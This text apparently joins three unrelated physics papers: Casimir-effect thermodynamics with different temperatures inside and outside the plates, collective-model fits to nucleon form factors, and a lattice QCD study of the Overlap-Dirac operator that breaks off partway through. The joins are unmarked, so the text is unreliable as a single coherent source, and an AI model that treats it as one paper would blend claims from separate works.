with N. Isgur at Jefferson Lab. This work has been partially
supported by grants from INS-ES, INFN/Lecce, NSERC, and UFF/GWU.
\section{Introduction}
\noindent
The Casimir effect \cite{CAS} is one of the fundamental effects
of Quantum Field Theory. It tests the importance of the zero point
energy. In principle, one considers two conducting infinitely
extended parallel plates at the positions $x_3=0$ and $x_3= a$.
These conducting plates change the vacuum energy of Quantum
Electrodynamics in such a way that a measurable attractive
force between both plates can be observed
\cite{EXP}. This situation does not essentially change, if
a nonvanishing temperature \cite{MF} is taken into account.
The thermodynamics
of the Casimir effect \cite{BML} \cite{GREIN}
and related problems
\cite{BARTO}
is well investigated.\\
Here we shall treat the different regions separately.
We assume a temperature $T$ for the space between
the plates and a temperature $ T' $ for the space outside the plates.
Thereby we consider the right plate at $ x_3=a $ as movable, so
that different thermodynamic processes, such as isothermal or
isentropic motions, can be studied.
At first we investigate the thermodynamics of the space between
the two plates by setting $T'=0$. This can be viewed as the black
body radiation
(BBR) for a special geometry. The surprising effect is that, for
vanishing distance ($a\rightarrow 0$), in isentropic processes
the temperature approaches a finite value, which is completely
determined by the fixed entropy. This is in contrast to the
expected behaviour of the standard BBR, if the
known expression derived for a large volume is extrapolated
to a small volume.
For large values of $a$ the BBR takes the standard form.
As a next topic we consider the Casimir pressure assuming
that the two physical regions, i.e. the spaces between and
outside the two plates possess different temperatures.
Depending on the choices of $T$ and $T'$
a different
physical behaviour is possible.
For $T'<T$ the external pressure is reduced in comparison with the
standard case $T'=T$. Therefore we expect the existence of
an equilibrium point, where the pure Casimir
attraction ($T=0$ effect ) and the
differences of the radiation pressures compensate each other.
This point is unstable, so that for isothermal processes
the movable plate moves either to
$a\rightarrow 0$ or to $a \rightarrow \infty$. However, an
isentropic motion reduces the internal radiation pressure
for growing distances, so that in this case
there is an additional stable equilibrium point.
\section{Thermodynamic Functions}
The thermodynamic functions are already determined by different
methods \cite{MF} \cite{BML}. We recalculate them by
statistical mechanics including the zero-point energy and cast
them in a simpler form which can be studied in detail \cite{MR}.
For technical reasons the
system is embedded in a large cube (side L). As space between the
plates
we consider the volume $L^2a$, the region outside is given by
$L^2(L-a)$. All extensive thermodynamic functions are defined per area.
\\
Free energy $\phi = F/L^2$:
\begin{eqnarray}
\label{1}
\phi_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{720} + g(v))
+\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ]a ,\\
\label{2}
\phi_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
-\frac{\hbar c \pi^6}{45}(\frac{v'}{a})^4](L-a).
\end{eqnarray}
Energy $e = E/L^2$:
\begin{eqnarray*}
e_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{720} + g(v)
-v \partial_v g(v))
+\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ]a ,\\
e_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
+\frac{3 \hbar c \pi^6}{45}(\frac{v'}{a})^4](L-a).
\end{eqnarray*}
Pressure:
\begin{eqnarray}
\label{3}
p_{int} &=& [\frac{\hbar c \pi^2}{a^4}(-\frac{1}{240} + 3g(v)
-v\partial_v g(v))
-\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4} ],\\
\label{4}
p_{ext} &=& [\frac{3\hbar c}{\pi^2} \frac{1}{\lambda^4}
-\frac{\hbar c \pi^6}{45}(\frac{v'}{a})^4].
\end{eqnarray}
Entropy $\sigma = S/(k L^2)$:
\begin{eqnarray}
\label{5}
\sigma_{int} = -\frac{ \pi}{a^3} \partial_v g(v) a;\;\;\,
\sigma_{ext} = \frac{4\pi^5}{45} (\frac{v'}{a})^3 (L-a),
\end{eqnarray}
$\lambda$ regularizes ($\lambda \rightarrow 0 $)
the contributions from the zero-point
energy. The thermodynamics is governed by the function $g(v)$.
We list two equivalent expressions:
\begin{eqnarray}
\label{6}
g(v) = -v^3[\frac{1}{2}\zeta (3) + k(\frac{1}{v})] =
\frac{1}{720} -\frac{\pi^4}{45}v^4 -
\frac{v}{4\pi^2}[\frac{1}{2} \zeta(3) + k(4\pi^2 v)].
\end{eqnarray}
The function $k(x)$ is given by
\begin{eqnarray}
\label{7}
k(x) = (1- x\partial_x)\sum_{n=1}^{\infty}
\frac{1}{n^3}\frac{1}{\exp(nx) - 1}.
\end{eqnarray}
It is strongly damped for large arguments. $v$ is the known variable
$v = a T k/(\hbar \pi c)$, the variable $v'$ contains
the temperature $T'$ instead of $T$.
\section{Black Body Radiation}
\noindent
As a first topic we consider the space between the two plates as
a generalization of the usual black body radiation (BBR) for a
special geometry $L \times L \times a $. Contrary to the
standard treatment, we include here both the internal and
the external zero-point energy.
Thereby parameter-dependent divergent contributions compensate
each other, whereas the physically irrelevant
term $\sim L/{\lambda^4}$ can be omitted \cite{MR}.
If we approximate the function $g$ for large $v$
by $g \simeq {1}/{720} - (\pi^4/45) v^4
- \zeta(3)/(8\pi^2) v $, we obtain
\begin{eqnarray}
\label{8}
\phi_{as} &=& \frac{\pi^2 \hbar c}{a^3}[-\frac{\pi^4}{45}v^4
-\frac{\zeta(3) }{8\pi^2} v],\;\;\;
\sigma_{as} = \frac{\pi}{a^2} [\frac{4\pi^4}{45}v^3
+\frac{\zeta(3) }{8\pi^2} ],\\
\label{9}
p_{as}&=& \frac{\pi^2 \hbar c}{a^4} [\frac{\pi^4}{45}v^4
-\frac{\zeta(3) }{4\pi^2} v],\;\;\;\
e_{as}= \frac{\pi^2 \hbar c}{a^3} \frac{3\pi^4}{45}v^4.
\end{eqnarray}
These expressions contain the large-volume
contributions
corresponding to the standard BBR (first term)
and corrections.
In the other limit of small $v$,
we have to use $g(v) = - v^3 \zeta(3)/2 $ and get
\begin{eqnarray}
\label{10}
\phi_{o} &=& \frac{\pi^2 \hbar c}{a^3}[-\frac{1}{720}
-\frac{\zeta(3) }{2} v^3],\;\;\;
\sigma_{o} = \frac{\pi}{a^2}
\frac{3 \zeta(3) }{2} v^2, \\
\label{11}
p_{o}&=& \frac{\pi^2 \hbar c}{a^4} [-\frac{1}{240}],\;\;\;\
e_{o}= \frac{\pi^2 \hbar c}{a^3} [-\frac{1}{720}
+\zeta(3) v^3].
\end{eqnarray}
In this case the contributions of the zero point energy
dominate. It is known that nondegenerate vacuum states
do not contribute to the entropy, which indeed vanishes at
$T=0$.\\
Let us now consider isentropic processes. This means
that we fix the values of the entropy for the internal
region (\ref{5}) during the complete process.
Technically we
express this fixed value according to
the value of the variable $v$ either through the approximation
(\ref{8}) or (\ref{10}).
Large distances
and/or
high temperatures lead to large values of $v$ so we have to
use $\sigma_{as}$. Constant entropy means
\begin{eqnarray}
\label{12}
\sigma = {\rm const.} =
\sigma_{as} = \frac{4\pi^2k^3}{45(\hbar c)^3} a T^3
+\frac{\zeta(3)}{8\pi} \frac{1}{a^2 }.
\end{eqnarray}
Asymptotically this is the standard BBR relation $S = L^2 \sigma_{as}
= {\rm const.} \times V T^3 $, valid here for large $T$ and
$V$. If we now consider smaller values of $a$, then, because of
eq.(\ref{5}),
also $-\partial_v g(v)$
takes smaller values. It is possible to prove \cite{MR}
the inequalities
$ g <0 $, $ \partial_v g(v) <0 $ and $ (\partial_v)^2 g(v) <0 $.
This monotonic behaviour of $\partial_v g(v)$ leads to the
conclusion that also the corresponding values of $v$ become
smaller. Consequently, we have to apply the
other representation (\ref{10}) for small $v$
and obtain
\begin{eqnarray}
\label{13}
\sigma =\sigma_{as}=\sigma_{o}
=\frac{k^2}{\hbar^2 c^2 \pi}
\frac{3 \zeta(3) }{2} T^2.
\end{eqnarray}
This means that for $ a \rightarrow 0 $ the temperature
does not tend to infinity, but approaches the finite value
\begin{eqnarray}
\label{14}
T = \left(\sigma \,\, 2 \hbar^2 c^2 \pi/(3 \zeta(3) k^2)
\right)^{1/2}.
\end{eqnarray}
This is in contrast to the expectation: if we apply the
standard expression of BBR, fixed entropy implies
$VT^3 = {\rm const.} $, so that the temperature tends to
infinity for vanishing volume.
However this standard expression for BBR,
derived for a continuous frequency spectrum, is not valid
for small distances. The reduction of the degrees of freedom,
i.e. the transition from a continuous frequency spectrum to
a discrete spectrum, is the reason for our result.
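The limiting temperature of Eq.~(\ref{14}), equivalently $kT=\hbar c\,[2\pi\sigma/(3\zeta(3))]^{1/2}$, can be evaluated directly. A minimal numerical sketch (Python; quoting $\sigma$ per square micrometer is a unit choice made here for illustration only, not part of the derivation):

```python
import math

HBARC = 0.197327            # hbar*c in eV*micrometer
ZETA3 = 1.2020569031595943  # zeta(3)

def limiting_kT_eV(sigma):
    """k*T (eV) reached as a -> 0 at fixed entropy, Eq. (14):
    kT = hbar*c * sqrt(2*pi*sigma / (3*zeta(3))),
    with sigma = S/(k L^2) given in micrometer^-2."""
    return HBARC * math.sqrt(2.0 * math.pi * sigma / (3.0 * ZETA3))

print(f"sigma = 1/um^2  ->  kT = {limiting_kT_eV(1.0):.3f} eV")
```

The $\sqrt{\sigma}$ scaling makes explicit that the limiting temperature is fixed entirely by the entropy and not by the plate separation.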
\section{Equilibrium Points of the Casimir Pressure}
\noindent
The Casimir pressure results from the contributions of
the internal and the external regions acting on the right
movable plate.
\begin{eqnarray}
\label{15}
P(a,T,T') = P_{ext}(T') + P_{int}(a,T)
= \frac{\pi^2 \hbar c}{a^4}p(v)
+\frac{\pi^2 k^4}{45 (\hbar c)^3}(T^4 - {T'}^4),
\end{eqnarray}
where
\begin{eqnarray}
p(v) = -\frac{1}{4\pi^2} v[\zeta(3) +(2 - v\partial_v)k(4\pi^2v)]
=-\frac{1}{240} +3g(v) - v\partial_{v}g(v)
-\frac{\pi^4}{45} v^4.\nonumber
\end{eqnarray}
Usually one considers the case $T=T'$, so that the Casimir
pressure is prescribed by $p(v)$ alone.
It is known that
$P(a,T,T'=T)$ is a negative but monotonically rising function
from $-\infty$ (for $ a\rightarrow 0 $) to $ \; 0\; $ (for
$a\rightarrow \infty $).
It is clear that the addition of a positive pressure
$ \frac{\pi^2 k^4}{45 (\hbar c)^3}(T^4 - {T'}^4) $ for $T>T'$
stops the Casimir attraction at a finite value of $ v$.
The question is whether this equilibrium point is
stable or not. The answer
follows from the monotonically rising behaviour of the standard
Casimir pressure.
\begin{eqnarray}
\label{16}
\frac{d}{da}P(a,T,T') =\frac{d}{da}P(a,T,T'=T) >0.
\end{eqnarray}
Consequently this equilibrium point is unstable
(see also \cite{MR}). \\
Next we consider the space between the two plates not for fixed
temperature but as a thermodynamically closed system with
fixed entropy. In the
external region we assume again a fixed
temperature $T'$.
To solve this problem in principle, it is sufficient to discuss
our system for large $v$ (by large $v$ we mean such
values of $v$ for which the asymptotic approximations (\ref{8}),
(\ref{9}) are valid; this region starts at
$ v> 0.2 $ ).
Using our asymptotic
formulae (\ref{8}),(\ref{9}) we write the Casimir pressure
as
\begin{eqnarray}
\label{17}
P(a,v,T') = \frac{\pi^2 \hbar c}{a^4}[\frac{\pi^4}{45}v^4
-\frac{\zeta(3)}{4\pi^2 }v
- \frac{\pi^4}{45}{v'}^4 ],
\end{eqnarray}
with $v' = aT' k/(\hbar c \pi)$ where $v$ has to be determined
from the condition $ \sigma_{as}=\sigma = {\rm const.} $ or
\begin{eqnarray}
\label{18}
\pi v^3 = [ a^2 \sigma - \zeta(3)/(8\pi)]\, 45/(4\pi^4).
\end{eqnarray}
Then we may write
\begin{eqnarray}
\label{19}
P(a,v,T') = \frac{\pi^2 \hbar c}{a^4}[\frac{\sigma a^2}
{4\pi} -\frac{9\zeta(3)}{32\pi^2 }]
\{\frac{45}{4\pi^4}(\frac{\sigma a^2}{\pi}
- \frac{\zeta(3)}{8\pi^2}) \}^{1/3}
-\frac{\pi^2 \hbar c}{a^4} \frac{\pi^4}{45}{v'}^4.
\end{eqnarray}
At first we consider the case $T'=0$.
We look for the possible
equilibrium points $P(a,v,T'=0) =0$. The result is
$ v^3 = 45\zeta(3)/(4 \pi^6)$. This corresponds to $v=0.24$.
For this value of $v$ the approximation used is not very good, but
acceptable.
A complete numerical estimate \cite{MR} gives the same value.
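This root is a one-line computation; the following check (plain Python) reproduces $v\simeq 0.24$ and verifies that it solves the balance condition of Eq.~(\ref{17}) at $v'=0$, $\frac{\pi^4}{45}v^4 = \frac{\zeta(3)}{4\pi^2}v$:

```python
import math

ZETA3 = 1.2020569031595943  # zeta(3)

# Equilibrium condition P(a, v, T'=0) = 0 in the asymptotic regime:
# (pi^4/45) v^4 = zeta(3)/(4 pi^2) v  =>  v^3 = 45 zeta(3) / (4 pi^6)
v_eq = (45.0 * ZETA3 / (4.0 * math.pi ** 6)) ** (1.0 / 3.0)
residual = math.pi ** 4 / 45.0 * v_eq ** 4 - ZETA3 / (4.0 * math.pi ** 2) * v_eq

print(f"v_eq = {v_eq:.4f}, residual = {residual:.1e}")
```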
Now we express the temperature $ T$ included in $v$ with the
help of the equation for isentropic motions
(\ref{18}) and obtain
$ a^2 = 9\zeta(3)/(8 \pi \sigma)$.
The instability of this point can be seen directly by looking
at
\begin{eqnarray}
\label{20}
\frac{d}{da}P(a,T,T'=0) &=& - \frac{4}{a} P(a,T,T'=0)
+ \frac{\pi^2 \hbar c}{a^4}
[\frac{4 \pi^4}{45}v^3
-\frac{\zeta(3)}{4\pi^2 }]
(\frac{dv}{da })_{\sigma} |_{P=0} \nonumber\\
&= & \frac{\pi^2 \hbar c}{a^4}\frac{3\zeta(3)}{4\pi^2}
(\frac{dv}{da })_{\sigma}.
\end{eqnarray}
It is intuitively clear that
$(\frac{dv}{da })_{\sigma}$ is positive; an explicit proof
is given in \cite{MR}.
So it is clear that this point is unstable,
as in the isothermal case. If we consider, in
eq.(\ref{17}), the variable $v= aTk/(\hbar c \pi) $ at
fixed $T$, there is no further equilibrium point.
This result for isothermal processes is, however, not
valid for isentropic processes. In this case we obtain
according to eq.(\ref{19}) a second trivial equilibrium point
at $a \rightarrow \infty $ for vanishing external temperature
($v'=0$).
Between both zeroes we have one maximum. So we conclude:
For isentropic processes there must be
two equilibrium points; the left one is unstable, the
right one at $ a \rightarrow \infty $ corresponds to a
vanishing derivative. If we now
add a not too high external pressure with the help of an external
temperature $T'$, then this second equilibrium point
- present for isentropic processes - becomes stable.
So, in principle, we may observe oscillations
around the second equilibrium point.
\section*{Acknowledgments}
We would like to thank C. B. Lang and N. Pucker
for their constant support and K. Scharnhorst, G. Barton and
P. Kocevar for discussions on the present topic.
\section*{References}
\section{Introduction}
Electromagnetic form factors of the nucleon and its
excitations (baryon resonances) provide a powerful tool
to investigate the structure of the nucleon.
These form factors can be measured in electroproduction
as a function of the four-momentum squared $q^2=-Q^2$ of the virtual
photon.
In this contribution we present a simultaneous study of the elastic
form factors of the nucleon and the transition form factors,
for both of which there exist exciting new data \cite{newdata}.
The analysis is carried out in the framework of a collective model of
the nucleon \cite{BIL}. We address the effects of relativistic
corrections and couplings to the meson cloud.
\section{Collective model of baryons}
In the recently introduced collective model of baryons \cite{BIL}
the radial excitations of the nucleon are described as vibrational
and rotational excitations of an oblate top.
The electromagnetic form factors are obtained by folding with a
distribution of the charge and magnetization over the entire volume
of the baryon. All calculations are carried out in the Breit frame.
\subsection{Elastic form factors}
In the collective model, the electric and magnetic form factors
of the nucleon are expressed in terms of a common intrinsic
dipole form factor \cite{BIL}.
The effects of the meson cloud surrounding the nucleon are taken into
account by coupling the nucleon form factors to the isoscalar vector
mesons $\omega$ and $\phi$ and the isovector vector meson $\rho$.
The coupling is carried out at the level of the Sachs form factors.
The large width of the $\rho$ meson is taken into account according
to the prescription of \cite{IJL}, and the constraints from
perturbative QCD are imposed by scaling $Q^2$ with the strong
coupling constant \cite{GK}.
We carried out a simultaneous fit to all four electromagnetic form
factors of the nucleon and the nucleon charge radii, and found good
agreement with the world data, including the new data for the neutron
form factors (square boxes in Fig.~\ref{gempn}). The oscillations
around the dipole values are due to the meson cloud couplings.
\begin{figure}
\vfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1a.ps,width=\linewidth,angle=-90}}
\end{minipage}\hfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1b.ps,width=\linewidth,angle=-90}}
\end{minipage}
\vspace{1pt}
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1c.ps,width=\linewidth,angle=-90}}
\end{minipage}\hfill
\begin{minipage}{.5\linewidth}
\centerline{\epsfig{file=b98_fig1d.ps,width=\linewidth,angle=-90}}
\end{minipage}
\caption[]{Nucleon form factors as a function of $Q^2$ (GeV/c)$^2$:
a) $G_E^p/F_D$ from \protect\cite{gemp},
b) $G_M^p/\mu_p F_D$ from \protect\cite{gemp},
c) $G_E^n$ from \protect\cite{gen} and
d) $G_M^n/\mu_n F_D$ from \protect\cite{gmn};
IJL from \protect\cite{IJL} and GK from \protect\cite{GK};
$F_D=1/(1+Q^2/0.71)^2$~.}
\label{gempn}
\end{figure}
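For reference, the dipole parameterization $F_D$ used to normalize the data in Fig.~\ref{gempn} is elementary to evaluate (a minimal sketch; $Q^2$ in (GeV/c)$^2$):

```python
def dipole_ff(q2):
    """Dipole form factor F_D = 1/(1 + Q^2/0.71)^2, with Q^2 in (GeV/c)^2."""
    return 1.0 / (1.0 + q2 / 0.71) ** 2

for q2 in (0.0, 0.71, 2.0):
    print(f"Q^2 = {q2:4.2f}  ->  F_D = {dipole_ff(q2):.3f}")
```

Deviations of the plotted ratios from unity thus measure the departure of the data from pure dipole behavior.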
\subsection{Transition form factors}
Recent experiments on eta-photoproduction have yielded valuable
new information on the helicity amplitudes of the N(1520)$D_{13}$
and N(1535)$S_{11}$ resonances.
In Table~\ref{ratios} we show the model-independent ratios of
photocouplings that have been extracted from the new data
\cite{Nimai1,Nimai2}.
These values are in excellent agreement with those of the collective
model \cite{BIL}. In the last column we show the effect of relativistic
corrections to the electromagnetic transition operator.
In Fig.~\ref{n1535} we show the N(1535)$S_{11}$ proton helicity
amplitude. The new data are indicated by diamonds and square boxes.
The effect of relativistic corrections (dashed line) to the
nonrelativistic results (solid line) in the collective model
of \cite{BIL} is small, and shows up mainly at small values of $Q^2$.
\begin{figure}[ht]
\centering
\psfig{figure=b98_fig2.ps,height=7cm,width=10cm,angle=-90}
\caption[]{N(1535)$S_{11}$ proton helicity amplitude in
$10^{-3}$ GeV$^{-1/2}$ as a function of $Q^2$ (GeV/c)$^2$.
A factor of $+i$ is suppressed. The data are taken from \cite{s11}.}
\label{n1535}
\end{figure}
\begin{table}
\centering
\caption[]{Ratios of helicity amplitudes.}
\label{helamp}
\vspace{15pt}
\begin{tabular}{lllll}
\hline
& & & & \\
N(1535)$S_{11}$ & $A^n_{1/2}/A^p_{1/2}$
& --0.84 $\pm$ 0.15 \cite{Nimai1} & --0.81 \cite{BIL} & --0.90 \\
N(1520)$D_{13}$ & $A^p_{3/2}/A^p_{1/2}$
& --2.5 $\pm$ 0.2 $\pm$ 0.4 \cite{Nimai2}
& --2.53 \cite{BIL} & --2.66 \\
& & & & \\
\hline
\end{tabular}
\label{ratios}
\end{table}
\section{Summary and conclusions}
We presented a simultaneous analysis of the four elastic
form factors of the nucleon and the transition form factors
in a collective model of baryons, and found
good agreement with the new data presented at this conference.
The deviations of the nucleon form factors from the dipole
form were attributed to couplings to the meson cloud
which were taken into account using vector meson dominance.
The helicity amplitudes of the N(1520)$D_{13}$ and N(1535)$S_{11}$
resonances as well as their model-independent ratios are reproduced
well. The effect of relativistic corrections is small, and shows up
mainly at small values of $Q^2$.
In conclusion, the present analysis of electromagnetic
couplings shows that the collective model of baryons
provides a good overall description of the available data.
\section*{Acknowledgements}
This work is supported in part by DGAPA-UNAM under project IN101997
and by grant No. 94-00059 from the United States-Israel Binational Science
Foundation (BSF).
\section*{References}
\section{Introduction}
\label{sec:intro}
The Overlap-Dirac operator~\cite{Herbert1} derived from the overlap
formalism for chiral fermions on the lattice~\cite{over} provides a
non-perturbative regularization of chiral fermions coupled vectorially
to a gauge field. The massless Overlap-Dirac operator is given by (the
lattice spacing is set to one)
\begin{equation}
D(0)={1\over 2} \left[1 + \gamma_5\hat H_a \right].
\label{eq:D0}
\end{equation}
$\hat H_a$ is a hermitian operator that depends on the background gauge field
and has eigenvalues equal to $\pm 1$. There are two sets of choices for
$\hat H_a$. The simplest example in the first set is $\epsilon(H_w)$
where $\gamma_5 H_w(-m)$ ($m_c < m < 2$)
is the usual Wilson-Dirac operator on the
lattice with a negative fermion mass~\cite{Herbert1} and $-m_c$ is the
critical mass, which goes to zero in the continuum limit. One could replace
$H_w$ by any improvements of the Wilson-Dirac operator with the mass in the
supercritical region but smaller than where the doublers become light.
The simplest example in the other set is obtained from the domain wall
formalism~\cite{kaplan} and $\hat H_a=\epsilon(\log(T_w))$ where $T_w(m)$ is
the transfer matrix associated with the propagation of the four
dimensional Wilson fermion in the extra
direction~\cite{Herbert3}. Here $m_c < m < 2$ is the domain wall mass.
Again, one can replace the five dimensional Wilson-Dirac fermion
by any improvements.
The massive Overlap-Dirac operator
is given by
\begin{equation}
D(\mu)={1\over 2} \left[1+\mu + (1-\mu) \gamma_5\hat H_a \right]
\label{eq:Dmu}
\end{equation}
with $0\le\mu\le 1$ describing fermions with positive mass all the way from
zero to infinity. For small $\mu$, $\mu$ is proportional to the fermion mass.
When $\hat H_a = \epsilon (\log(T_w))$, the bare mass $\mu$ is exactly the
standard mass term in the domain wall formalism~\cite{Shamir,Herbert3}.
The analytical expressions derived in this paper
are valid for any generic choice of $\hat H_a$.
Our numerical results are obtained with the choice of $\hat H_a =\epsilon(H_w)$.
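To make the operation $\epsilon(\cdot)$ concrete: for a Hermitian matrix it is defined spectrally, $\epsilon(H)=\sum_i {\rm sign}(\lambda_i)\,|i\rangle\langle i|$, so that $\epsilon(H)^2=1$. A minimal illustration for a real symmetric $2\times 2$ matrix (a toy stand-in for $H_w$; in actual simulations $H_w$ is a large sparse matrix and $\epsilon(H_w)$ must be approximated):

```python
import math

def sign_function_2x2(h11, h12, h22):
    """epsilon(H) for a real symmetric 2x2 matrix H with nonzero
    eigenvalues, built from its spectral decomposition."""
    m = 0.5 * (h11 + h22)                       # mean of the eigenvalues
    r = math.hypot(0.5 * (h11 - h22), h12)      # half the eigenvalue gap
    lp, lm = m + r, m - r                       # the two eigenvalues
    sp, sm = math.copysign(1.0, lp), math.copysign(1.0, lm)
    # epsilon(H) = s+ P+ + s- P-, projectors P+/- = (H - l-/+ 1)/(l+ - l-)
    d = lp - lm
    e11 = (sp * (h11 - lm) + sm * (lp - h11)) / d
    e22 = (sp * (h22 - lm) + sm * (lp - h22)) / d
    e12 = (sp - sm) * h12 / d
    return [[e11, e12], [e12, e22]]
```

One can check that the result squares to the identity, as required of $\hat H_a$.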
The massless Overlap-Dirac operator has exact zero eigenvalues, due to
topology, in topologically non-trivial gauge fields, and these zero
eigenvalues are always paired with eigenvalues exactly equal to
unity~\cite{Herbert1,EHN}. All exact zero eigenvalues are chiral, and
their partners at unity are also chiral but with opposite
chirality. The rest of the eigenvalues of the Overlap-Dirac operator
come in complex conjugate pairs and one eigenvector is obtained by the
operation of $\gamma_5$ on the other eigenvector. The behavior of the
Overlap-Dirac operator on the lattice is essentially that of a
continuum massless fermion.
The external fermion propagator is given by
\begin{equation}
{\tilde D}^{-1}(\mu)=(1-\mu)^{-1}\left[D^{-1}(\mu) -1\right]~.
\end{equation}
The subtraction at $\mu=0$ is evident from the original overlap
formalism~\cite{over} and the massless propagator anti-commutes with
$\gamma_5$~\cite{Herbert1,Herbert2}. With our choice of subtraction
and overall normalization the propagator satisfies the relation
\begin{equation}
\mu \langle b^\dagger | \Bigl[ \gamma_5{\tilde D}^{-1}(\mu) \Bigr]^2
| b \rangle
= \langle b^\dagger | {\tilde D}^{-1}(\mu) | b \rangle
\ \ \ \ \forall \ \ b \ \ \ {\rm satisfying} \ \ \
\gamma_5 | b \rangle= \pm | b\rangle
\label{eq:Goldstone}
\end{equation}
for all values of $\mu$ in an arbitrary gauge field background. This
relation will be evident from the discussion in
section~\ref{sec:chiral_cond}. The fermion propagator on the lattice
is related to the continuum propagator by
\begin{equation}
D_c^{-1} (m_q) = Z^{-1}_\psi {\tilde D}^{-1}(\mu)
\qquad {\rm with} \quad m_q = Z_m^{-1} \mu
\end{equation}
where $Z_m$ and $Z_\psi$ are the mass and wavefunction renormalizations,
respectively. Requiring that (\ref{eq:Goldstone}) hold in the continuum
results in $Z_\psi Z_m =1$. For
$\hat H_a =\epsilon(H_w(m))$ we find
\begin{equation}
Z_\psi = Z_m^{-1} = 2m
\end{equation}
at tree level, and
a tadpole improved estimate gives
\begin{equation}
Z_\psi = Z_m^{-1} = {2 \over u_0} \left[ m - 4 (1 - u_0) \right] ~,
\end{equation}
where $u_0$ is one's favorite choice for the tadpole link value. For
the above relation, it is most consistently obtained from $m_c$, the
critical mass of standard Wilson fermion spectroscopy.
In this paper, we study QCD in the quenched limit on the lattice using
the Overlap-Dirac operator. Our aim is to study the behavior of chiral
susceptibilities on a finite lattice in the massless limit. In
section~\ref{sec:chiral_cond}, we derive analytic expressions for
various chiral susceptibilities using the spectral decomposition of
the Overlap-Dirac operator. These formulae do not reveal any new
physics not already known from formal arguments in the continuum;
however, they are valid for any lattice spacing, not only in the
continuum limit. These formulae will help us simplify the numerical
computations and disentangle contributions due to global topology from
the rest of the contributions. We also discuss the massless limit of
the chiral susceptibilities in quenched QCD. In
section~\ref{sec:details}, we present some details of the algorithm
used to numerically compute the chiral susceptibilities on a finite
lattice. Our numerical results are presented in
section~\ref{sec:results} and compared with the analytical expressions
obtained in section~\ref{sec:chiral_cond}. Similar numerical work has
been done recently using domain wall fermions with a finite extent in
the fifth direction~\cite{Col_lat98}.
\section{Chiral condensate and susceptibilities}
\label{sec:chiral_cond}
An analysis of the Overlap-Dirac operator can be performed in an
arbitrary gauge field background by noting that $\hat H_a$ can be
written in block diagonal form with $2\times 2$ blocks in the chiral
basis~\cite{EHN}. We start by recalling a few properties of the
Overlap-Dirac operator $D$ for a single Dirac fermion: $(\gamma_5 D)^2$
commutes with $\gamma_5$ and both operators can therefore be
diagonalized simultaneously. The massive Overlap-Dirac operator can be
related to the massless one, from (\ref{eq:Dmu}), as
\begin{equation}
D(\mu)=\left(1-\mu \right) \left[ D(0) + {\mu\over 1-\mu}\right]\quad .
\label{eq:Dmu_0}
\end{equation}
We find it convenient to work in the chiral eigenbasis of $(\gamma_5 D(0))^2$
for massless fermions, $\mu = 0$. In this basis $D(\mu)$ takes on the following
block diagonal form~\cite{EHN}:
\begin{itemize}
\item There are $|Q|$ blocks of the form
$$\pmatrix{ \mu & 0 \cr 0 & 1 \cr}$$ associated with the global
topology of the configuration. These $|Q|$ blocks will be robust under
perturbations of the gauge field background. The two modes per block
have opposite chiralities. The chiralities of the modes with
eigenvalues $\mu$ will all be the same and dictated by the sign of the
global topology $Q$.
\item There are $2NV-|Q|$ blocks of the form
$$
\pmatrix{ (1-\mu) \lambda_i^2 + \mu & (1-\mu)\lambda_i\sqrt{1-\lambda_i^2} \cr
-(1-\mu)\lambda_i\sqrt{1-\lambda_i^2} & (1-\mu)\lambda_i^2 + \mu \cr } $$
with $0 \le \lambda_i \le 1$, $i=1,2,\cdots,2NV-|Q|$, depending on the
background gauge field. The $\lambda_i^2$'s are the eigenvalues of
$(\gamma_5D(0))^2$.
We leave open the possibility that $n_z^\prime$
of these eigenvalues could be exactly zero. These are accidental zeros
in that they would be lifted by a small perturbation of the gauge field
background. In each subspace, $\gamma_5 = \pmatrix { 1 & 0 \cr 0 & -1 \cr}$.
\end{itemize}
The matrix can be inverted in the above form to give the following block
diagonal form for the external propagator
${\tilde D}^{-1}(\mu)=(1-\mu)^{-1}\left[D^{-1}(\mu) -1\right]$:
\begin{itemize}
\item There are $|Q|$ blocks of the form
$$\pmatrix{ {1 \over \mu} & 0 \cr 0 & 0 \cr}$$
\item There are $2NV-|Q|$ blocks of the form
$${1\over \lambda_i^2(1-\mu^2) + \mu^2}
\pmatrix{ \mu(1-\lambda_i^2)
& - \lambda_i\sqrt{1-\lambda_i^2} \cr
\lambda_i\sqrt{1-\lambda_i^2} & \mu(1-\lambda_i^2)\cr } $$
\end{itemize}
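These block formulae are simple enough to check by machine. The following snippet (our own illustration, not part of the original computation) inverts a generic $2\times 2$ block of $D(\mu)$ symbolically and confirms the quoted block form of ${\tilde D}^{-1}(\mu)=(1-\mu)^{-1}\left[D^{-1}(\mu)-1\right]$:

```python
# Consistency check (ours, illustrative): invert a generic 2x2 block of
# D(mu) symbolically and confirm the block form of the external
# propagator tilde-D^{-1}(mu) = (1-mu)^{-1} [D^{-1}(mu) - 1] quoted above.
import sympy as sp

mu, lam = sp.symbols('mu lambda', positive=True)
s = sp.sqrt(1 - lam**2)

D = sp.Matrix([[(1 - mu)*lam**2 + mu,  (1 - mu)*lam*s],
               [-(1 - mu)*lam*s,       (1 - mu)*lam**2 + mu]])
Dtinv = sp.simplify((D.inv() - sp.eye(2))/(1 - mu))

claim = sp.Matrix([[mu*(1 - lam**2), -lam*s],
                   [lam*s,            mu*(1 - lam**2)]])/(lam**2*(1 - mu**2) + mu**2)
assert sp.simplify(Dtinv - claim) == sp.zeros(2, 2)

# topological block: D = diag(mu, 1) gives tilde-D^{-1} = diag(1/mu, 0)
Dtop = sp.Matrix([[mu, 0], [0, 1]])
assert sp.simplify((Dtop.inv() - sp.eye(2))/(1 - mu)) == sp.Matrix([[1/mu, 0], [0, 0]])
```

In particular the determinant of the generic block reduces to $\lambda_i^2(1-\mu^2)+\mu^2$, the denominator appearing throughout this section.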
We will use $\langle \cdots \rangle_A$ to denote the expectation value of
a fermionic observable in a fixed gauge field background, and $\langle \cdots
\rangle$ for the expectation value averaged over a gauge field ensemble.
From the above expression for the fermion propagator in a background
gauge field, we obtain
